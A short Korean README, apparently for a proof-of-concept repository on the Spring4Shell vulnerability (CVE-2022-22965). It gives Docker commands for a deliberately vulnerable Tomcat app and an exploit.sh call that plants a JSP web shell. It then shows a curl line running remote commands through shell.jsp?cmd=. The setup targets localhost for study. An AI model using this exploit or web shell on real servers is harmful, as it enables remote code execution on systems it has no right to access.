
CVE-2022-22965 Spring4Shell에 대한 PoC 및 익스플로잇
Spring4Shell (CVE-2022-22965) 취약한 Tomcat 서버와 취약한 spring4shell 애플리케이션을 포함한 개념 증명(PoC).
docker build . -t spring4shell
docker run -p 80:8080 spring4shell
필요한 경우 디버거 포트도 함께 노출하여 실행할 수 있습니다:
docker run -p 80:8080 –p 5005:5005 spring4shell
IntelliJ Idea에서 원격 디버거를 설정하는 방법에 대한 자세한 내용은 원본 블로그 게시물을 참조하세요!
./exploit.sh --url http://localhost/spring4shell/hello --dir spring4shell
그런 다음 다음과 같이 원격으로 모든 명령을 실행할 수 있습니다:
curl http://localhost/spring4shell/shell.jsp?cmd=id --output -
...또는 위의 URL을 방문하여 실행할 수 있습니다.